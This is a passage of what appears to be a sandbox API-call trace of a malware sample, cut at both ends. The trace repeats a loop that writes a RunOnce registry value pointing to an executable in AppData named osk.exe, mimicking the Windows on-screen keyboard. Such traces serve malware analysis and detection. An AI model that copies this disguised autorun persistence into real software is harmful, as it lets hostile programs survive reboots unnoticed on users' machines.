uIDEvent=0x236c) returned 1 [0100.751] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.751] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.752] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.752] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.752] RegCloseKey (hKey=0x280) returned 0x0 [0100.752] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.752] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.752] SetTimer (hWnd=0x20280, nIDEvent=0x236d, uElapse=0xa, lpTimerFunc=0x0) returned 0x236d [0100.752] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.766] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.766] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.766] KillTimer (hWnd=0x20280, uIDEvent=0x236d) returned 1 [0100.766] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.767] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.767] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.767] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.768] RegCloseKey (hKey=0x280) returned 0x0 [0100.768] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.768] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.768] SetTimer (hWnd=0x20280, nIDEvent=0x236e, uElapse=0xa, lpTimerFunc=0x0) returned 0x236e [0100.768] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.791] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.791] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.792] KillTimer (hWnd=0x20280, uIDEvent=0x236e) returned 1 [0100.792] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.792] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.793] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.793] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.793] RegCloseKey (hKey=0x280) returned 0x0 [0100.793] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.793] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.793] SetTimer (hWnd=0x20280, nIDEvent=0x236f, uElapse=0xa, lpTimerFunc=0x0) returned 0x236f [0100.793] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.797] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.797] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.797] KillTimer (hWnd=0x20280, uIDEvent=0x236f) returned 1 [0100.798] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0100.798] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.798] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.798] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.798] RegCloseKey (hKey=0x280) returned 0x0 [0100.798] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.798] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.799] SetTimer (hWnd=0x20280, nIDEvent=0x2370, uElapse=0xa, lpTimerFunc=0x0) returned 0x2370 [0100.799] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.813] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.813] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.813] KillTimer (hWnd=0x20280, uIDEvent=0x2370) returned 1 [0100.814] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.814] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.814] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.814] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.815] RegCloseKey (hKey=0x280) returned 0x0 
[0100.815] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.815] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.815] SetTimer (hWnd=0x20280, nIDEvent=0x2371, uElapse=0xa, lpTimerFunc=0x0) returned 0x2371 [0100.815] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.828] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.828] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.829] KillTimer (hWnd=0x20280, uIDEvent=0x2371) returned 1 [0100.829] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.830] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.830] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.830] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.830] RegCloseKey (hKey=0x280) returned 0x0 [0100.830] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.830] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.831] SetTimer (hWnd=0x20280, nIDEvent=0x2372, uElapse=0xa, lpTimerFunc=0x0) returned 0x2372 [0100.831] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.844] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.844] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.844] KillTimer (hWnd=0x20280, uIDEvent=0x2372) returned 1 [0100.844] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.845] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.845] 
RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.845] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.845] RegCloseKey (hKey=0x280) returned 0x0 [0100.846] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.846] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.846] SetTimer (hWnd=0x20280, nIDEvent=0x2373, uElapse=0xa, lpTimerFunc=0x0) returned 0x2373 [0100.846] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.865] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.865] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.866] KillTimer (hWnd=0x20280, uIDEvent=0x2373) returned 1 [0100.866] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.866] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.866] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.867] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.867] RegCloseKey (hKey=0x280) returned 0x0 [0100.867] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.867] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.867] SetTimer (hWnd=0x20280, nIDEvent=0x2374, uElapse=0xa, lpTimerFunc=0x0) returned 0x2374 [0100.867] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.875] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.875] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.875] KillTimer (hWnd=0x20280, uIDEvent=0x2374) returned 1 [0100.875] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.876] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.876] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.876] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.876] RegCloseKey (hKey=0x280) returned 0x0 [0100.877] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.877] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.877] SetTimer (hWnd=0x20280, nIDEvent=0x2375, uElapse=0xa, lpTimerFunc=0x0) returned 0x2375 [0100.877] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.891] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.891] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.891] KillTimer (hWnd=0x20280, uIDEvent=0x2375) returned 1 [0100.891] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.891] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.891] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.892] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.892] RegCloseKey (hKey=0x280) returned 0x0 [0100.892] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.892] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.892] SetTimer (hWnd=0x20280, nIDEvent=0x2376, uElapse=0xa, lpTimerFunc=0x0) returned 0x2376 [0100.892] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.906] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.906] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.906] KillTimer (hWnd=0x20280, uIDEvent=0x2376) returned 1 [0100.907] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.907] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.912] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.912] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.913] RegCloseKey (hKey=0x280) returned 0x0 [0100.913] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.913] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0100.913] SetTimer (hWnd=0x20280, nIDEvent=0x2377, uElapse=0xa, lpTimerFunc=0x0) returned 0x2377 [0100.913] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.922] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.922] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.922] KillTimer (hWnd=0x20280, uIDEvent=0x2377) returned 1 [0100.923] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.923] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.923] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.923] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.923] RegCloseKey (hKey=0x280) returned 0x0 [0100.923] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.923] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.923] SetTimer (hWnd=0x20280, nIDEvent=0x2378, uElapse=0xa, lpTimerFunc=0x0) returned 0x2378 [0100.924] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.938] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.938] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.938] KillTimer (hWnd=0x20280, uIDEvent=0x2378) returned 1 [0100.938] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.938] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.939] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, 
dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.939] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.939] RegCloseKey (hKey=0x280) returned 0x0 [0100.939] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.939] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.939] SetTimer (hWnd=0x20280, nIDEvent=0x2379, uElapse=0xa, lpTimerFunc=0x0) returned 0x2379 [0100.939] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.953] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.953] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.953] KillTimer (hWnd=0x20280, uIDEvent=0x2379) returned 1 [0100.954] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.954] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.954] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.954] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.954] RegCloseKey (hKey=0x280) returned 0x0 [0100.954] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.955] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.955] SetTimer (hWnd=0x20280, nIDEvent=0x237a, uElapse=0xa, lpTimerFunc=0x0) returned 0x237a 
[0100.955] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.969] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.969] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.969] KillTimer (hWnd=0x20280, uIDEvent=0x237a) returned 1 [0100.969] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.970] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.970] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.970] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.970] RegCloseKey (hKey=0x280) returned 0x0 [0100.970] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.970] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.970] SetTimer (hWnd=0x20280, nIDEvent=0x237b, uElapse=0xa, lpTimerFunc=0x0) returned 0x237b [0100.970] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0100.984] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0100.984] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0100.985] KillTimer (hWnd=0x20280, uIDEvent=0x237b) returned 1 [0100.985] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.985] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0100.985] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: 
phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0100.985] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0100.986] RegCloseKey (hKey=0x280) returned 0x0 [0100.986] IUnknown:Release (This=0x7a9740) returned 0x1 [0100.986] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0100.986] SetTimer (hWnd=0x20280, nIDEvent=0x237c, uElapse=0xa, lpTimerFunc=0x0) returned 0x237c [0100.986] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.000] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.000] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.000] KillTimer (hWnd=0x20280, uIDEvent=0x237c) returned 1 [0101.000] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.001] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.001] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.001] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.001] RegCloseKey (hKey=0x280) returned 0x0 [0101.001] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.001] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.001] SetTimer (hWnd=0x20280, nIDEvent=0x237d, uElapse=0xa, lpTimerFunc=0x0) returned 0x237d [0101.001] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0101.016] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.016] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.016] KillTimer (hWnd=0x20280, uIDEvent=0x237d) returned 1 [0101.016] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.017] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.017] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.017] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.017] RegCloseKey (hKey=0x280) returned 0x0 [0101.017] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.017] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.018] SetTimer (hWnd=0x20280, nIDEvent=0x237e, uElapse=0xa, lpTimerFunc=0x0) returned 0x237e [0101.018] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.042] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.042] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.042] KillTimer (hWnd=0x20280, uIDEvent=0x237e) returned 1 [0101.042] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.043] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.043] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.043] RegSetValueExA (in: 
